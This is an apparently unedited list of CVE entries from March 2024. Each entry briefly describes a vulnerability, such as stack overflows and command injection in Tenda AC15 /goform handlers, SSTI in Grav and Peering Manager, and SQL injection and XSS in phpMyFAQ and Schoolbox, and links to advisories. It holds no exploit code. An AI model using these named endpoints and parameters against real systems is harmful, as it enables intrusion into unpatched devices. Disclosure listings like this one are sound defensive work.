CVE 2024 28151 Candidate Jenkins HTML Publisher Plugin 1.32 and earlier archives invalid symbolic links in report directories on agents and recreates them on the controller, allowing attackers with Item/Configure permission to determine whether a path on the Jenkins controller file system exists, without being able to access it. MISC:Jenkins Security Advisory 2024-03-06 | URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3303 Assigned (20240305)
CVE 2024 28150 Candidate Jenkins HTML Publisher Plugin 1.32 and earlier does not escape job names, report names, and index page titles shown as part of the report frame, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. MISC:Jenkins Security Advisory 2024-03-06 | URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3302 Assigned (20240305)
CVE 2024 2815 Candidate A vulnerability classified as critical has been found in Tenda AC15 15.03.20_multi. Affected is the function R7WebsSecurityHandler of the file /goform/execCommand of the component Cookie Handler. The manipulation of the argument password leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257670 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257670 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257670 | MISC:VDB-257670 | Tenda AC15 Cookie execCommand R7WebsSecurityHandler stack-based overflow | URL:https://vuldb.com/?id.257670 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/R7WebsSecurityHandler.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/R7WebsSecurityHandler.md Assigned (20240321)
CVE 2024 28149 Candidate Jenkins HTML Publisher Plugin 1.16 through 1.32 (both inclusive) does not properly sanitize input, allowing attackers with Item/Configure permission to implement cross-site scripting (XSS) attacks and to determine whether a path on the Jenkins controller file system exists. MISC:Jenkins Security Advisory 2024-03-06 | URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3301 Assigned (20240305)
CVE 2024 2814 Candidate A vulnerability was found in Tenda AC15 15.03.20_multi. It has been rated as critical. This issue affects the function fromDhcpListClient of the file /goform/DhcpListClient. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257669 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257669 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257669 | MISC:VDB-257669 | Tenda AC15 DhcpListClient fromDhcpListClient stack-based overflow | URL:https://vuldb.com/?id.257669 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/fromDhcpListClient_page.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/fromDhcpListClient_page.md Assigned (20240321)
CVE 2024 28131 Candidate EasyRange Ver 1.41 contains an issue with the executable file search path when displaying an extracted file on Explorer, which may lead to loading an executable file resides in the same folder where the extracted file is placed. If this vulnerability is exploited, arbitrary code may be executed with the privilege of the running program. Note that the developer was unreachable, therefore, users should consider stop using EasyRange Ver 1.41. MISC:https://jvn.jp/en/jp/JVN13113728/index.html | URL:https://jvn.jp/en/jp/JVN13113728/index.html Assigned (20240305)
CVE 2024 2813 Candidate A vulnerability was found in Tenda AC15 15.03.20_multi. It has been declared as critical. This vulnerability affects the function form_fast_setting_wifi_set of the file /goform/fast_setting_wifi_set. The manipulation of the argument ssid leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257668. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257668 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257668 | MISC:VDB-257668 | Tenda AC15 fast_setting_wifi_set form_fast_setting_wifi_set stack-based overflow | URL:https://vuldb.com/?id.257668 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/form_fast_setting_wifi_set.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/form_fast_setting_wifi_set.md Assigned (20240321)
CVE 2024 28128 Candidate Cross-site scripting vulnerability exists in FitNesse releases prior to 20220319, which may allow a remote unauthenticated attacker to execute an arbitrary script on the web browser of the user who is using the product and accessing a link with a specially crafted certain parameter. MISC:http://fitnesse.org/FitNesseDownload | URL:http://fitnesse.org/FitNesseDownload | MISC:https://github.com/unclebob/fitnesse | URL:https://github.com/unclebob/fitnesse | MISC:https://github.com/unclebob/fitnesse/blob/master/SECURITY.md | URL:https://github.com/unclebob/fitnesse/blob/master/SECURITY.md | MISC:https://jvn.jp/en/jp/JVN94521208/ | URL:https://jvn.jp/en/jp/JVN94521208/ Assigned (20240306)
CVE 2024 28126 Candidate Cross-site scripting vulnerability exists in 0ch BBS Script ver.4.00. An arbitrary script may be executed on the web browser of the user accessing the website that uses the product. Note that the developer was unreachable, therefore, users should consider stop using 0ch BBS Script ver.4.00. MISC:https://jvn.jp/en/jp/JVN46874970/ | URL:https://jvn.jp/en/jp/JVN46874970/ Assigned (20240305)
CVE 2024 28125 Candidate FitNesse all releases allows a remote authenticated attacker to execute arbitrary OS commands. MISC:http://fitnesse.org/FitNesseDownload | URL:http://fitnesse.org/FitNesseDownload | MISC:https://github.com/unclebob/fitnesse | URL:https://github.com/unclebob/fitnesse | MISC:https://github.com/unclebob/fitnesse/blob/master/SECURITY.md | URL:https://github.com/unclebob/fitnesse/blob/master/SECURITY.md | MISC:https://jvn.jp/en/jp/JVN94521208/ | URL:https://jvn.jp/en/jp/JVN94521208/ Assigned (20240306)
CVE 2024 28123 Candidate Wasmi is an efficient and lightweight WebAssembly interpreter with a focus on constrained and embedded systems. In the WASMI Interpreter, an Out-of-bounds Buffer Write will arise if the host calls or resumes a Wasm function with more parameters than the default limit (128), as it will surpass the stack value. This doesn’t affect calls from Wasm to Wasm, only from host to Wasm. This vulnerability was patched in version 0.31.1. MISC:https://github.com/wasmi-labs/wasmi/commit/f7b3200e9f3dc9e2cbca966cb255c228453c792f | URL:https://github.com/wasmi-labs/wasmi/commit/f7b3200e9f3dc9e2cbca966cb255c228453c792f | MISC:https://github.com/wasmi-labs/wasmi/releases/tag/v0.31.1 | URL:https://github.com/wasmi-labs/wasmi/releases/tag/v0.31.1 | MISC:https://github.com/wasmi-labs/wasmi/security/advisories/GHSA-75jp-vq8x-h4cq | URL:https://github.com/wasmi-labs/wasmi/security/advisories/GHSA-75jp-vq8x-h4cq Assigned (20240304)
CVE 2024 28122 Candidate JWX is Go module implementing various JWx (JWA/JWE/JWK/JWS/JWT, otherwise known as JOSE) technologies. This vulnerability allows an attacker with a trusted public key to cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. This issue has been patched in versions 1.2.29 and 2.0.21. MISC:https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29 | URL:https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29 | MISC:https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21 | URL:https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21 | MISC:https://github.com/lestrrat-go/jwx/security/advisories/GHSA-hj3v-m684-v259 | URL:https://github.com/lestrrat-go/jwx/security/advisories/GHSA-hj3v-m684-v259 Assigned (20240304)
CVE 2024 28121 Candidate stimulus_reflex is a system to extend the capabilities of both Rails and Stimulus by intercepting user interactions and passing them to Rails over real-time websockets. In affected versions more methods than expected can be called on reflex instances. Being able to call some of them has security implications. To invoke a reflex a websocket message of the following shape is sent: `\"target\":\"[class_name]#[method_name]\",\"args\":[]`. The server will proceed to instantiate `reflex` using the provided `class_name` as long as it extends `StimulusReflex::Reflex`. It then attempts to call `method_name` on the instance with the provided arguments. This is problematic as `reflex.method method_name` can be more methods that those explicitly specified by the developer in their reflex class. A good example is the instance_variable_set method. This vulnerability has been patched in versions 3.4.2 and 3.5.0.rc4. Users unable to upgrade should: see the backing GHSA advisory for mitigation advice. FULLDISC:20240313 StimulusReflex CVE-2024-28121 | URL:http://seclists.org/fulldisclosure/2024/Mar/16 | MISC:https://github.com/stimulusreflex/stimulus_reflex/blob/0211cad7d60fe96838587f159d657e44cee51b9b/app/channels/stimulus_reflex/channel.rb#L83 | URL:https://github.com/stimulusreflex/stimulus_reflex/blob/0211cad7d60fe96838587f159d657e44cee51b9b/app/channels/stimulus_reflex/channel.rb#L83 | MISC:https://github.com/stimulusreflex/stimulus_reflex/commit/538582d240439aab76066c72335ea92096cd0c7f | URL:https://github.com/stimulusreflex/stimulus_reflex/commit/538582d240439aab76066c72335ea92096cd0c7f | MISC:https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.4.2 | URL:https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.4.2 | MISC:https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.5.0.rc4 | URL:https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.5.0.rc4 | MISC:https://github.com/stimulusreflex/stimulus_reflex/security/advisories/GHSA-f78j-4w3g-4q65 | URL:https://github.com/stimulusreflex/stimulus_reflex/security/advisories/GHSA-f78j-4w3g-4q65 Assigned (20240304)
CVE 2024 28120 Candidate codeium-chrome is an open source code completion plugin for the chrome web browser. The service worker of the codeium-chrome extension doesn't check the sender when receiving an external message. This allows an attacker to host a website that will steal the user's Codeium api-key, and thus impersonate the user on the backend autocomplete server. This issue has not been addressed. Users are advised to monitor the usage of their API key. MISC:https://github.com/Exafunction/codeium-chrome/security/advisories/GHSA-8c7j-2h97-q63p | URL:https://github.com/Exafunction/codeium-chrome/security/advisories/GHSA-8c7j-2h97-q63p | MISC:https://securitylab.github.com/advisories/GHSL-2024-027_GHSL-2024-028_codeium-chrome | URL:https://securitylab.github.com/advisories/GHSL-2024-027_GHSL-2024-028_codeium-chrome Assigned (20240304)
CVE 2024 2812 Candidate A vulnerability was found in Tenda AC15 15.03.05.18/15.03.20_multi. It has been classified as critical. This affects the function formWriteFacMac of the file /goform/WriteFacMac. The manipulation of the argument mac leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257667. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257667 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257667 | MISC:VDB-257667 | Tenda AC15 WriteFacMac formWriteFacMac os command injection | URL:https://vuldb.com/?id.257667 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formWriteFacMac.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formWriteFacMac.md Assigned (20240321)
CVE 2024 28119 Candidate Grav is an open-source, flat-file content management system. Prior to version 1.7.45, due to the unrestricted access to twig extension class from grav context, an attacker can redefine the escape function and execute arbitrary commands. Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance. Version 1.7.45 contains a patch for this issue. MISC:https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe | URL:https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe | MISC:https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58 | URL:https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58 | MISC:https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99 | URL:https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99 Assigned (20240304)
CVE 2024 28118 Candidate Grav is an open-source, flat-file content management system. Prior to version 1.7.45, due to the unrestricted access to twig extension class from Grav context, an attacker can redefine config variable. As a result, attacker can bypass a previous SSTI mitigation. Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance. Version 1.7.45 contains a fix for this issue. MISC:https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe | URL:https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe | MISC:https://github.com/getgrav/grav/security/advisories/GHSA-r6vw-8v8r-pmp4 | URL:https://github.com/getgrav/grav/security/advisories/GHSA-r6vw-8v8r-pmp4 Assigned (20240304)
CVE 2024 28117 Candidate Grav is an open-source, flat-file content management system. Prior to version 1.7.45, Grav validates accessible functions through the Utils::isDangerousFunction function, but does not impose restrictions on twig functions like twig_array_map, allowing attackers to bypass the validation and execute arbitrary commands. Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance. Upgrading to patched version 1.7.45 can mitigate this issue. MISC:https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe | URL:https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe | MISC:https://github.com/getgrav/grav/security/advisories/GHSA-qfv4-q44r-g7rv | URL:https://github.com/getgrav/grav/security/advisories/GHSA-qfv4-q44r-g7rv Assigned (20240304)
CVE 2024 28116 Candidate Grav is an open-source, flat-file content management system. Grav CMS prior to version 1.7.45 is vulnerable to a Server-Side Template Injection (SSTI), which allows any authenticated user (editor permissions are sufficient) to execute arbitrary code on the remote server bypassing the existing security sandbox. Version 1.7.45 contains a patch for this issue. MISC:https://github.com/getgrav/grav/commit/4149c81339274130742831422de2685f298f3a6e | URL:https://github.com/getgrav/grav/commit/4149c81339274130742831422de2685f298f3a6e | MISC:https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh | URL:https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh Assigned (20240304)
CVE 2024 28115 Candidate FreeRTOS is a real-time operating system for microcontrollers. FreeRTOS Kernel versions through 10.6.1 do not sufficiently protect against local privilege escalation via Return Oriented Programming techniques should a vulnerability exist that allows code injection and execution. These issues affect ARMv7-M MPU ports, and ARMv8-M ports with Memory Protected Unit (MPU) support enabled (i.e. `configENABLE_MPU` set to 1). These issues are fixed in version 10.6.2 with a new MPU wrapper. MISC:https://github.com/FreeRTOS/FreeRTOS-Kernel/releases/tag/V10.6.2 | URL:https://github.com/FreeRTOS/FreeRTOS-Kernel/releases/tag/V10.6.2 | MISC:https://github.com/FreeRTOS/FreeRTOS-Kernel/security/advisories/GHSA-xcv7-v92w-gq6r | URL:https://github.com/FreeRTOS/FreeRTOS-Kernel/security/advisories/GHSA-xcv7-v92w-gq6r Assigned (20240304)
CVE 2024 28114 Candidate Peering Manager is a BGP session management tool. There is a Server Side Template Injection vulnerability that leads to Remote Code Execution in Peering Manager <=1.8.2. As a result arbitrary commands can be executed on the operating system that is running Peering Manager. This issue has been addressed in version 1.8.3. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/peering-manager/peering-manager/commit/8a865fb596c11ad7caf45aef317d8fcbce7f85ff | URL:https://github.com/peering-manager/peering-manager/commit/8a865fb596c11ad7caf45aef317d8fcbce7f85ff | MISC:https://github.com/peering-manager/peering-manager/security/advisories/GHSA-q37x-qfrx-jcv6 | URL:https://github.com/peering-manager/peering-manager/security/advisories/GHSA-q37x-qfrx-jcv6 | MISC:https://owasp.org/www-community/attacks/Command_Injection | URL:https://owasp.org/www-community/attacks/Command_Injection | MISC:https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection | URL:https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection | MISC:https://stackoverflow.com/questions/73939573/how-to-sanitise-string-of-python-code-with-python | URL:https://stackoverflow.com/questions/73939573/how-to-sanitise-string-of-python-code-with-python Assigned (20240304)
CVE 2024 28113 Candidate Peering Manager is a BGP session management tool. In Peering Manager <=1.8.2, it is possible to redirect users to an arbitrary page using a crafted url. As a result users can be redirected to an unexpected location. This issue has been addressed in version 1.8.3. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/peering-manager/peering-manager/commit/49dc5593184d7740d81e57dbbe3f971d2969dfac | URL:https://github.com/peering-manager/peering-manager/commit/49dc5593184d7740d81e57dbbe3f971d2969dfac | MISC:https://github.com/peering-manager/peering-manager/security/advisories/GHSA-f4mf-5g28-q7f5 | URL:https://github.com/peering-manager/peering-manager/security/advisories/GHSA-f4mf-5g28-q7f5 Assigned (20240304)
CVE 2024 28112 Candidate Peering Manager is a BGP session management tool. Affected versions of Peering Manager are subject to a potential stored Cross-Site Scripting (XSS) attack in the `name` attribute of AS or Platform. The XSS triggers on a routers detail page. Adversaries are able to execute arbitrary JavaScript code with the permission of a victim. XSS attacks are often used to steal credentials or login tokens of other users. This issue has been addressed in version 1.8.3. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/peering-manager/peering-manager/security/advisories/GHSA-fmf5-24pq-rq2w | URL:https://github.com/peering-manager/peering-manager/security/advisories/GHSA-fmf5-24pq-rq2w | MISC:https://owasp.org/www-community/attacks/xss | URL:https://owasp.org/www-community/attacks/xss Assigned (20240304)
CVE 2024 28111 Candidate Canarytokens helps track activity and actions on a network. Canarytokens.org supports exporting the history of a Canarytoken's incidents in CSV format. The generation of these CSV files is vulnerable to a CSV Injection vulnerability. This flaw can be used by an attacker who discovers an HTTP-based Canarytoken to target the Canarytoken's owner, if the owner exports the incident history to CSV and opens in a reader application such as Microsoft Excel. The impact is that this issue could lead to code execution on the machine on which the CSV file is opened. Version sha-c595a1f8 contains a fix for this issue. MISC:https://github.com/thinkst/canarytokens/commit/c595a1f884b986da2ca05aa5bff9ae5f93c6a4aa | URL:https://github.com/thinkst/canarytokens/commit/c595a1f884b986da2ca05aa5bff9ae5f93c6a4aa | MISC:https://github.com/thinkst/canarytokens/security/advisories/GHSA-fqh6-v4qp-65fv | URL:https://github.com/thinkst/canarytokens/security/advisories/GHSA-fqh6-v4qp-65fv Assigned (20240304)
CVE 2024 28110 Candidate Go SDK for CloudEvents is the official CloudEvents SDK to integrate applications with CloudEvents. Prior to version 2.15.2, using cloudevents.WithRoundTripper to create a cloudevents.Client with an authenticated http.RoundTripper causes the go-sdk to leak credentials to arbitrary endpoints. When the transport is populated with an authenticated transport, then http.DefaultClient is modified with the authenticated transport and will start to send Authorization tokens to any endpoint it is used to contact. Version 2.15.2 patches this issue. MISC:https://github.com/cloudevents/sdk-go/blob/67e389964131d55d65cd14b4eb32d57a47312695/v2/protocol/http/protocol.go#L104-L110 | URL:https://github.com/cloudevents/sdk-go/blob/67e389964131d55d65cd14b4eb32d57a47312695/v2/protocol/http/protocol.go#L104-L110 | MISC:https://github.com/cloudevents/sdk-go/commit/de2f28370b0d2a0f64f92c0c6139fa4b8a7c3851 | URL:https://github.com/cloudevents/sdk-go/commit/de2f28370b0d2a0f64f92c0c6139fa4b8a7c3851 | MISC:https://github.com/cloudevents/sdk-go/security/advisories/GHSA-5pf6-2qwx-pxm2 | URL:https://github.com/cloudevents/sdk-go/security/advisories/GHSA-5pf6-2qwx-pxm2 Assigned (20240304)
CVE 2024 2811 Candidate A vulnerability was found in Tenda AC15 15.03.20_multi and classified as critical. Affected by this issue is the function formWifiWpsStart of the file /goform/WifiWpsStart. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257666 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257666 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257666 | MISC:VDB-257666 | Tenda AC15 WifiWpsStart formWifiWpsStart stack-based overflow | URL:https://vuldb.com/?id.257666 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formWifiWpsStart.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formWifiWpsStart.md Assigned (20240321)
CVE 2024 28108 Candidate phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. Due to insufficient validation on the `contentLink` parameter, it is possible for unauthenticated users to inject HTML code to the page which might affect other users. _Also, requires that adding new FAQs is allowed for guests and that the admin doesn't check the content of a newly added FAQ._ This vulnerability is fixed in 3.2.6. MISC:https://github.com/thorsten/phpMyFAQ/commit/4fed1d9602f0635260f789fe85995789d94d6634 | URL:https://github.com/thorsten/phpMyFAQ/commit/4fed1d9602f0635260f789fe85995789d94d6634 | MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-48vw-jpf8-hwqh | URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-48vw-jpf8-hwqh Assigned (20240304)
CVE 2024 28107 Candidate phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. A SQL injection vulnerability has been discovered in the `insertentry` & `saveentry` when modifying records due to improper escaping of the email address. This allows any authenticated user with the rights to add/edit FAQ news to exploit this vulnerability to exfiltrate data, take over accounts and in some cases, even achieve RCE. This vulnerability is fixed in 3.2.6. MISC:https://github.com/thorsten/phpMyFAQ/commit/d0fae62a72615d809e6710861c1a7f67ac893007 | URL:https://github.com/thorsten/phpMyFAQ/commit/d0fae62a72615d809e6710861c1a7f67ac893007 | MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-2grw-mc9r-822r | URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-2grw-mc9r-822r Assigned (20240304)
CVE 2024 28106 Candidate phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. By manipulating the news parameter in a POST request, an attacker can inject malicious JavaScript code. Upon browsing to the compromised news page, the XSS payload triggers. This vulnerability is fixed in 3.2.6. MISC:https://github.com/thorsten/phpMyFAQ/commit/c94b3deadd87789389e1fad162bc3dd595c0e15a | URL:https://github.com/thorsten/phpMyFAQ/commit/c94b3deadd87789389e1fad162bc3dd595c0e15a | MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-6p68-36m6-392r | URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-6p68-36m6-392r Assigned (20240304)
CVE 2024 28105 Candidate phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. The category image upload function in phpmyfaq is vulnerable to manipulation of the `Content-type` and `lang` parameters, allowing attackers to upload malicious files with a .php extension, potentially leading to remote code execution (RCE) on the system. This vulnerability is fixed in 3.2.6. MISC:https://github.com/thorsten/phpMyFAQ/commit/9136883776af67dfdb0e8cf14f5e0ca22bf4f2e7 | URL:https://github.com/thorsten/phpMyFAQ/commit/9136883776af67dfdb0e8cf14f5e0ca22bf4f2e7 | MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-pwh2-fpfr-x5gf | URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-pwh2-fpfr-x5gf Assigned (20240304)
CVE 2024 28102 Candidate JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length. MISC:https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f | URL:https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f | MISC:https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97 | URL:https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97 Assigned (20240304)
CVE 2024 28101 Candidate The Apollo Router is a graph router written in Rust to run a federated supergraph that uses Apollo Federation. Versions 0.9.5 until 1.40.2 are subject to a Denial-of-Service (DoS) type vulnerability. When receiving compressed HTTP payloads, affected versions of the Router evaluate the `limits.http_max_request_bytes` configuration option after the entirety of the compressed payload is decompressed. If affected versions of the Router receive highly compressed payloads, this could result in significant memory consumption while the compressed payload is expanded. Router version 1.40.2 has a fix for the vulnerability. Those who are unable to upgrade may be able to implement mitigations at proxies or load balancers positioned in front of their Router fleet (e.g. Nginx, HAProxy, or cloud-native WAF services) by creating limits on HTTP body upload size. MISC:https://github.com/apollographql/router/commit/9e9527c73c8f34fc8438b09066163cd42520f413 | URL:https://github.com/apollographql/router/commit/9e9527c73c8f34fc8438b09066163cd42520f413 | MISC:https://github.com/apollographql/router/security/advisories/GHSA-cgqf-3cq5-wvcj | URL:https://github.com/apollographql/router/security/advisories/GHSA-cgqf-3cq5-wvcj Assigned (20240304)
CVE 2024 2810 Candidate A vulnerability has been found in Tenda AC15 15.03.05.18/15.03.20_multi and classified as critical. Affected by this vulnerability is the function formWifiWpsOOB of the file /goform/WifiWpsOOB. The manipulation of the argument index leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257665 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257665 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257665 | MISC:VDB-257665 | Tenda AC15 WifiWpsOOB formWifiWpsOOB stack-based overflow | URL:https://vuldb.com/?id.257665 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formWifiWpsOOB.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V1.0%20V15.03.20_multi/formWifiWpsOOB.md Assigned (20240321)
CVE 2024 28098 Candidate The vulnerability allows authenticated users with only produce or consume permissions to modify topic-level policies, such as retention, TTL, and offloading settings. These management operations should be restricted to users with the tenant admin role or super user role. This issue affects Apache Pulsar versions from 2.7.1 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Apache Pulsar users should upgrade to at least 2.10.6. 2.11 Apache Pulsar users should upgrade to at least 2.11.4. 3.0 Apache Pulsar users should upgrade to at least 3.0.3. 3.1 Apache Pulsar users should upgrade to at least 3.1.3. 3.2 Apache Pulsar users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions. MISC:https://lists.apache.org/thread/3m6923y3wxpdcs9346sjvt8ql9swqc2z | URL:https://lists.apache.org/thread/3m6923y3wxpdcs9346sjvt8ql9swqc2z | MISC:https://pulsar.apache.org/security/CVE-2024-28098/ | URL:https://pulsar.apache.org/security/CVE-2024-28098/ Assigned (20240304)
CVE 2024 28097 Candidate Calendar functionality in Schoolbox application before version 23.1.3 is vulnerable to stored cross-site scripting allowing authenticated attacker to perform security actions in the context of the affected users. MISC:https://schoolbox.education/ | URL:https://schoolbox.education/ | MISC:https://www.themissinglink.com.au/security-advisories/cve-2024-28097 | URL:https://www.themissinglink.com.au/security-advisories/cve-2024-28097 Assigned (20240304)
CVE 2024 28096 Candidate Class functionality in Schoolbox application before version 23.1.3 is vulnerable to stored cross-site scripting allowing authenticated attacker to perform security actions in the context of the affected users. MISC:https://schoolbox.education/ | URL:https://schoolbox.education/ | MISC:https://www.themissinglink.com.au/security-advisories/cve-2024-28096 | URL:https://www.themissinglink.com.au/security-advisories/cve-2024-28096 Assigned (20240304)
CVE 2024 28095 Candidate News functionality in Schoolbox application before version 23.1.3 is vulnerable to stored cross-site scripting allowing authenticated attacker to perform security actions in the context of the affected users. MISC:https://schoolbox.education/ | URL:https://schoolbox.education/ | MISC:https://www.themissinglink.com.au/security-advisories/cve-2024-28095 | URL:https://www.themissinglink.com.au/security-advisories/cve-2024-28095 Assigned (20240304)
CVE 2024 28094 Candidate Chat functionality in Schoolbox application before version 23.1.3 is vulnerable to blind SQL Injection enabling the authenticated attackers to read, modify, and delete database records. MISC:https://schoolbox.education/ | URL:https://schoolbox.education/ | MISC:https://www.themissinglink.com.au/security-advisories/cve-2024-28094 | URL:https://www.themissinglink.com.au/security-advisories/cve-2024-28094 Assigned (20240304)
CVE 2024 28093 Candidate The TELNET service of AdTran NetVanta 3120 18.01.01.00.E devices is enabled by default, and has default credentials for a root-level account. MISC:https://github.com/actuator/cve/blob/main/AdTran/CVE-2024-28093 | MISC:https://github.com/actuator/cve/blob/main/AdTran/CWE-287 Assigned (20240304)
CVE 2024 28092 Candidate UBEE DDW365 XCNDDW365 8.14.3105 software on hardware 3.13.1 allows a remote attacker within Wi-Fi proximity to conduct stored XSS attacks via RgFirewallEL.asp, RgDdns.asp, RgTime.asp, RgDiagnostics.asp, or RgParentalBasic.asp. The affected fields are SMTP Server Name, SMTP Username, Host Name, Time Server 1, Time Server 2, Time Server 3, Target, Add Keyword, Add Domain, and Add Allowed Domain. MISC:https://github.com/actuator/cve/blob/main/Ubee/CVE-2024-28092 Assigned (20240304)
